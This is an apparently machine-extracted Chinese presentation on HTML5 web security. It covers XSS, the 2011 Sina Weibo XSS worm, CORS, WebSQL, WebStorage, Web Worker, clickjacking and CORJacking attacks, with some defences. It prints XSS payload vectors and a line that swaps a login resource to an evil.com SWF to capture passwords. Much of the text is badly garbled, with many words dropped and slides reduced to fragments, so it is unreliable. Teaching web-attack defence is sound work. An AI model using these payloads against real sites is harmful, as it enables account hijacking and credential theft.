HTML5 问题 刘
1 户帐 录帐 户 银帐 员帐 击 (Cross Site Scripting) 恶 击 Web 页 面 里插 入恶意 html 2 业 读 篡 删 业 码 户浏览该页 时 Web html 码 执 达 恶 3 业 业 值 资 击 户 4 转账 5 发 电 邮 ( iframe frame XMLHttpRequest Flash 击 户 执 动 执 发 发 ) 6 马
XSS 击 2011 6 28 现 较 XSS 击 户 动发 诸 细节 业 让 女 人 心动的 100 诗 3D 团团 话 这是传说中的神仙眷侣啊 惊爆! 艳 经过线 动 为 hellosamy 户 20:14 带 V 认证 户 转发 20:30 页 访问 20:32 hellosamy 户 访问 21:02 补 毕
XSS 击实现 导致的原因是新浪名 人堂部分 XSS 过滤不严所致 : 1) 击 执 Ajax 过 单 发 2) 这 问题 Ajax Ajax same domain 执 这 这样 伪 same domain 执 Ajax 3) 发微博 :publish() weibo.com/mblog/publish.php 过 Ajax 陆 务 session 还在, 直接就可以成功发布微博 4) 发私信 : 发私信多了 一个步骤, 获取粉丝的 user id 键 getappkey() weibo.com/yourid/follow 页 面扒取所有的 user id 过 API 获取到粉丝信息, 获取之后然后通过 一个 for loop 语句来发送
标签 击 API 击 CORJacking Web Worker 击 WebSQL 击 Web Socket 击 Web Storage 击 CORS 击 ClickJacking CookieJacking
标签 击 <Audio> <Video> <Canvas> <Article> <Footer> poster autofocus onerror formaction oninput! <video><sourceonerror sourceonerror="javascript:alert(1) > <videoposter videoposter= javascript:alert(1) > <inputautofocus onfocus= alert(1) > <form><buttonformaction buttonformaction="javascript:alert(1)">
Canvas Canvas 说 HTML5 创 <img> 标签只是远程加载 一个图 片,<canvas> 标 签让 JavaScript 页 图 对 构 图 Canvas 现 战 传统 户 发 Canvas 浏览 戏 过对图 户 验证码
WebSQL 击 SQL 库 样 击 过 SQL 进 库 击 XSS 库 纵 XSS 击 获 骤 1 获 JavaScript 库对 2 获 SQLite 结构 3 获 4 1 检查输 入类型, 过滤危险字符 2 SQL 语句中使 用参数形式 3 谨慎对待每 一次 SQL 4 储 5 绝 XSS
CORS 击 1 HTTP 头只能说明请求来 自 一个特定的域, 但是并不能保证这个 事实 因为 HTTP 头可以被伪造 2 3 恶 请 4 5 针对 户 击 1 经 验证 请 应该 验证 Session ID Cookie 2 对 请 说验证 务 仅 须 3 过 请 HTTP 头 参数等
WebStorage 击 WebStorage 简介 HTML5 WebStorage 发 为应 创 储 储 LocalStorage 长 储 间 5M Cookie 储 问题 这 为 户 击 LocalStorage API 过 Javascript 这样 击 过 XSS 击 户 token 资 击 历 储 1 户 sessionid LocalStorage 储 sessionstorage 户 储 变 应该 临时变 变 2 储 为 们总 页 问题 储 WebStorage
WebWorker 击 WebWorker 绍 Javascript 单线 执 执 过 浏览 执 Javascript UI 线 导 浏览 进 态 WebWorker 计 过 线 执 这 现 这样 们 时执 JS 务 浏览 规 计 这 难 Botnet 1 对 户 说 访问 2 postmessage 时需要验证来源可信 ; 另外不要 使 用 innerhtml 现 浏览 textcontent 击 DDos 击 发 邮 户 访问恶 页 时 页 恶 码 户 浏览 鸡 WebWorker 规 执 线 击 DDos 击 发 邮 进 络 postmessage 带来的问题 WebWorker 访问 DOM 过 postmessageapi 线 对 HTML 标签进 行过滤, 或者你可以 自 行 编写过滤的逻辑和函数 postmessage HTML5 线 问 题 messaging 页 击 postmessage 过 务 经过验证 过滤 为 XSS 码 对输 进 验证 击 构 恶 data 页 DOM 构 XSS 击 ><script></ script>
Clickjacking 击 视觉 骗 web iframe 见 页 让 户 击 击 骗 户 击
Cookiejacking Cookie 实现原理其实和 ClickJacking 骗 户进 为 户 发 这 实 Facebook 应 这 应 让 户 图 尝试
CORJacking CORJacking- 资 CORJacking 资 HTML5 应 用有各种不同的资源, 例如 Flash Silverligh 视频 频 这 资 过 DOM 访问和控制 如果页 面存在 XSS 击 过 资 进 击 码载 swf 为 户 录 这 们 实现 逻辑 页 XSS 时 击 swf 换为 诈 资 document.getelementbyname( Login ).item(0).src= http://evil.com/login.swf ; 户 这样 录 输 户 码 录时 帐 经
Attack API, BeEF, XSS-Proxy XSS 击 浏览! Shell of the Future WebShell 处理器, 它利 用HTML5 请 话! Ravan JS 计 统 HTML5Web Worker 过 JS 线 执 击
谢谢!